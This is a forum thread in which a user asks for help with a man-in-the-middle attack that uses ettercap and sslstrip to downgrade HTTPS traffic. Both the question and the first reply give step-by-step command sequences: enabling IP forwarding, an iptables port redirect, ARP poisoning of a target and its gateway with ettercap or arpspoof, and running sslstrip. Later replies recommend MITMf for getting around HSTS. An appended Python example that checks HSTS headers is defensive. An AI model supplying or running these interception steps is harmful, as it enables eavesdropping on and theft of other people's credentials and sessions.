Forum Thread: Struggling to Perform a MITM Attack Using Ettercap and SSLStrip

Hi, I need some help performing a MITM attack using ettercap. I can access non-HTTPS websites on the target machine, but when I try to access HTTPS websites I either get "web page cannot be displayed" or something about a security certificate not being trusted. Am I doing anything wrong? Please help me out, it would be greatly appreciated. The steps below are the route I've followed, and I've also tried the graphical interface of ettercap with no luck.

Type in terminal: kwrite /etc/etter.conf
navigate to ec_uid, change the value 65534 to 0
navigate to ec_gid, change the value 65534 to 0
remove the # from the If you use iptables
save

Setup IP forwarding on my Kali device by typing:

echo 1 > /proc/sys/net/ipv4/ip_forward

and setup port redirection using Iptables:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Start SSLstrip

sslstrip -a -f -l 8080 -w ssl

then start Ettercap

ettercap -T -q -i wlan0 -M arp /ipofthetarget//

6 Responses

The following is a working method I used several times. Change the bold text according to your setup.
> echo 1 > /proc/sys/net/ipv4/ip_forward
> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
> arpspoof -i wlan0 -t TargetIP -r GatewayIP
> sslstrip -l 8080
Try this way (without ettercap) and see if it works.
TRT

Browsers have been updated and now use HSTS, which blocks MITM attacks & sslstrip. You should try MITMf (https://github.com/byt3bl33d3r/MITMf); it can override HSTS, but it's still a bit difficult if the target still has cookies from the previous session.

This ^
You can find numerous tutorials on this site on how to use it.

Thanks for the replies, and yeah, looks like MITM attacks are pretty much useless now with the HSTS after I looked into it.

Well, HSTS definitely makes it more difficult, but not impossible. Please check out Ciuffy's article here.
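
Added example (not part of any post in this thread): the replies above turn on whether the browser already holds an HSTS policy for the site. This Python check applies the RFC 6797 processing rules to a response to decide whether it actually establishes one; the function names, finding strings and sample responses are constructed for illustration.

```python
import re

PRELOAD_MIN_AGE = 31536000  # one year, the minimum hstspreload.org accepts

def parse_hsts(value):
    """Parse one Strict-Transport-Security value (RFC 6797, section 6.1).
    Returns {directive: value}, or None when a browser must ignore the header."""
    directives = {}
    for part in value.split(";"):
        name, _, arg = part.strip().partition("=")
        name = name.strip().lower()
        if not name:
            continue                      # tolerate empty segments such as ";;"
        if name in directives:
            return None                   # each directive may appear only once
        directives[name] = arg.strip().strip('"')  # quoted-string form is legal
    if not re.fullmatch(r"[0-9]+", directives.get("max-age", "")):
        return None                       # max-age is required and must be digits
    return directives

def assess(scheme, headers):
    """headers: list of (name, value) pairs as received. Returns (enforced, findings)."""
    values = [v for n, v in headers if n.lower() == "strict-transport-security"]
    if not values:
        return False, ["no HSTS header"]
    if scheme != "https":
        return False, ["HSTS received over plain HTTP is ignored"]
    policy = parse_hsts(values[0])        # only the first header field is processed
    if policy is None:
        return False, ["malformed header is ignored"]
    max_age = int(policy["max-age"])
    if max_age == 0:
        return False, ["max-age=0 deletes any stored policy"]
    findings = []
    if "includesubdomains" not in policy:
        findings.append("subdomains not covered")
    if not ("preload" in policy and "includesubdomains" in policy
            and max_age >= PRELOAD_MIN_AGE):  # eligibility only, not actual listing
        findings.append("not preload-eligible: first visit has no stored policy")
    return True, findings

# Constructed sample responses (not captured traffic).
SAMPLES = {
    "strong": ("https", [("Strict-Transport-Security",
                          "max-age=63072000; includeSubDomains; preload")]),
    "short": ("https", [("strict-transport-security", 'max-age="300"')]),
    "over_http": ("http", [("Strict-Transport-Security", "max-age=63072000")]),
    "duplicate": ("https", [("Strict-Transport-Security", "max-age=1; max-age=2")]),
}

if __name__ == "__main__":
    for label, (scheme, headers) in SAMPLES.items():
        print(label, assess(scheme, headers))
```
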

But is this MITM attack only for a local network?
Thanks
